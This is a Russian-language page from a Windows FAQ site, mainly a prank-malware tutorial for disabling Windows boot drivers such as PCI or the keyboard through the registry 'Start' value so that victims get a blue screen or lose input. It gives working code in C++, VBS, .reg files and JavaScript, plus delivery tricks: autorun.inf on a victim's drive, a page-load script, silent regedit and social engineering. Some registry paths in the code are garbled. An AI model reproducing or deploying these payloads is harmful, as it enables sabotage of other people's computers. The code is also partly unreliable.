RSS

IT Glossary    1_9  A  B  C  D  E  F  G  H  I  J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z  .....  A  Б  В  Г  Д  Ж  З  И  К  Л  М  Н  О  П  Р  С  Т  У  Ф  Х  Ц  Ч

   

  1. Введение в Интернет и безопасность в нем

    1.1. Интернет
    1.2 Обзор внутреннего устройства TCP/IP
    1.3 Проблемы, связанные с безопасностью
    1.4 Насколько уязвимы сети организаци в Интернете?

  2. Введение в брандмауэры

    2.1 Понятие брандмауэра
    2.2 Почему именно брандмауэры?
    2.3 Проблемы, возникающие из-за брандмауэров
    2.4 Компоненты брандмауэра

  3. Объединение частей в единое целое - примеры брандмауэров

    3.1 Брандмауэр с фильтрацией пакетов
    3.2 Брандмауэр на основе машины, подключенной к двум сетям
    3.3 Брандмауэр с изолированным хостом
    3.4 Брандмауэр с изолированной подсетью
    3.5 Интеграция модемных пулов с брандмауэрами

  4. Следующие шаги

    4.1 Политика брандмауэра
    4.2 Приобретение брандмауэра
    4.3 Организационные вопросы с брандмауэрами

  5. Библиография
  6. Приложение. Онлайновые информационные ресурсы
 
 

Бесплатная консультация специалиста

 
Ваш регион:
Ваше имя:

Ваш телефон

(можно сотовый)

Ваш вопрос (можно кратко)



 
Intro
Наверное, ни для кого не секрет, что список сервисов можно получить по адресу HKLM.:

..\AudioSrv
..\KbdClass
..\MouClass
..\FlpyDisk
..\Usbohci
..\Cdrom
..\PCI

Все эти сервисы по совместительству являются еще и драйверами (см. %systemroot%).Отключение происходит ТОЛЬКО после того, как пробежит белая полоса загрузки (перед появлением эмблемы Microsoft. Все параметры запуска сервиса находятся в DWORD-параметре Start. Вот они:
2 - автозагрузка
3 - ручная загрузка
4 - отключено (примечание. Можно просто удалить Start)
Ниже приведены исходники программ, выполняющих одну и туже функцию, на разных языках.
 
Microsoft Visual Studio
Все фишки с сокращением размера я сдирал с www.uinc.ru и www.sources.ru. Создаем пустое Win32 приложение без поддержки MFC и ATL. Active Solution Configuration ставим в Release. Дальше идем в Linker => Input, прописываем единственную библиотеку msvcrt.lib. А вот собственно и исходник:
Main.cpp:
#include <windows.h>
#include "compress.h"
void New_WinMain(void)
{
HKEY hk;
RegOpenKey(HKLM,"SYSTEM\CurrentControlSet\Services\PCI",&hk);
RegDeleteValue(hk,"Start");
RegCloseKey(hk);
}
compress.h:
#ifdef NDEBUG
#pragma optimize("gsy",on)
#pragma comment(linker,"/MERGE:.rdata=.text")
#pragma comment(linker,"/ENTRY:New_WinMain")
#pragma comment(linker,"/NODEFAULTLIB")
#pragma comment(linker,"/merge:.rdata=.data")
#pragma comment(linker,"/merge:.text=.data")
#if _MSC_VER >= 1000
#endif
#endif
При запуске данной программы (она весит 1 килограмм) отключается PCI, поэтому после первой же перезагрузки появится синий экран и козяблики :) Чтобы отключить что-то другое - надо просто заменить PCI скажем на KbdClass (примечание: при отключении, скажем, той же клавы лучше отключать еще и ubohci, т.к. велика вероятность того, что у юзера USB клава/крыса)
Visual Basic Scripts
ИМХО vbs - идеальное средство для западлоcтроения. Он есть практически у всех юзверей и для написания скриптов не требуется ни каких инструментов (за исключением Блокнота). Значит в блокноте (или подобном текстовом редакторе) создаем новый документ и сохраняем с расширением *.vbs. Вот код:
On Error Resume Next
Dim Fuck
Set Fuck = WScript.CreateObject("WScript.Shell")
Fuck.RegWrite "HKLM", "Fucked"
Основным недостатком является то, что юзверь может просмотреть содержимое файла. Радует, пожалуй, только один факт - не всем это надо и не все знают, что сей сырц делает.
 
Regedit
Это конечно не язык программирования, но на нем удобно писать некое подобие скриптов для автоматизации работы с реестром. Основным плюсом является присутствие данной программы (regedit) у каждого рядового юзверя windows. В блокноте создать новый документ и написать вот этот текст:
REGEDIT 4
[HKLM]"Start"=DWORD:00000004
[HKLM]"Start"=DWORD:00000004
[HKLM]"Start"=DWORD:00000004
[HKLM]"Start"=DWORD:00000004
[HKLM]"Start"=DWORD:00000004
[HKLM]"Start"=DWORD:00000004
и сохранить с расширением *.reg. Но, при запуске у юзверя спрашивают, хочет он загрузить эту хрень или нет. Он, конечно, нажмет, нет :) Чтобы этого не произошло, предусмотрительные программеры Microsoft'а придумали такую вот штуку - при использовании синтаксиса regedit /s <file_name> никаких вопросов задано не будет.
 
Впаривание
Теперь поговорим немного о том, как это дело впарить. Можно положить программу в корень винта (чужого) и туда же кинуть файл autorun.inf следующего содержания:
[AUTORUN]
Open=Suck_My_Dick.exe
Естественно, ни о чем не подозревающая жертва тыкает на диск два раза, а дальше
сам знаешь чего :) HTML с применением скриптов тоже действенное средство:
<BODY onLoad="HackXP()">
<SCRIPT language=JavaScript>
var WShell = new ActiveXObject( "WScript.Shell" );
function HackXP(){
WShell.RegWrite("HKLM\System\CurrentControlSet\Services\PCI\Start", "Fucked");}
</SCRIPT>
</BODY>
Но, имхо, соц. инженерия - получше будет. Небольшая обработка жертвы - и она сама удаляет Start))
 
Защита
В связи с выше прочитанным, по крайней мере, у меня, возникает вопрос: А как уберечься от подобных пакостей??? Можно засунуть файл типа этого в автозагрузку:
REGEDIT 4
[HKLM]"Start"=DWORD:00000002
[HKLM]"Start"=DWORD:00000002
[HKLM]"Start"=DWORD:00000002
[HKLM]"Start"=DWORD:00000002
[HKLM]"Start"=DWORD:00000002
[HKLM]"Start"=DWORD:00000002
но если необходимо вводить пароль (попробуй его ввести без клавиатуры :) или выскакивает сообщение, ничего не выйдет... Но не все так плохо. Значит перед загрузкой системы зажми F8 и держи до появления меню. В меню выбери "Загрузка последней удачной конфигурации (с работоспособными параметрами)" и все дела (примечание: На некоторых машинах сбивались все настройки, так что будь осторожнее). Программа тестировалась на WinXP Prof. (SP1) и Home (SP1), хотя, по идее, должна работать на всех NT-like системах. Для работы нужны права админа. ЗЫ. Вандалы могут удалить все файлы из %systemroot%(копии системных файлов) а затем %systemroot%(сами дрова).
Win 2K faq
Win 2K(kernel & MEM.managment)
Win 2K и XP (Securit)
Win 2K и XP (Boot)
Win 2K и XP (Install)
Win 2K иXP (Admin)
Win 2K и XP (File system)
Win 2K и XP (Services)
Сервисы в Windows XP
Win 2K & XP optim & tweak
Win XP faq
Win XP faq #2
Win XP faq (net)
Win XP faq (lan)
Win XP recover
WinXP & ntfs
WinXP & game faq
Win PE
Win Vista
Win Vista FAQ
Win Server 2003 tweaks & tricks

seo & website usability inet html os faq hardware faq memory video cpu hdd mainboard faq printer & scaner modem mobiles hackzone


Windows 10 | Registry Windows 10 | Windows7: Общие настройки | Windows7: Реестр | Windows7: Реестр faq | Windows7: Настроки сети | Windows7: Безопасность | Windows7: Брандмауэр | Windows7: Режим совместимости | Windows7: Пароль администратора |  |  |  |  | Память | SDRAM | DDR2 | DDR3 | Quad Band Memory (QBM) | SRAM | FeRAM | Словарь терминов | Video | nVIDIA faq | ATI faq  | Интегрированное видео faq | TV tuners faq | Терминология | Форматы графических файлов | Работа с цифровым видео(faq) | Кодеки faq | DVD faq | DigitalVideo faq | Video faq (Архив) | CPU | HDD & Flash faq | Как уберечь винчестер | HDD faq | Cable faq | SCSI адаптеры & faq | SSD | Mainboard faq | Printer & Scaner | Горячая линия бесплатной юридической консультации | Благотворительность

На главную | Cookie policy | Sitemap

 ©  2004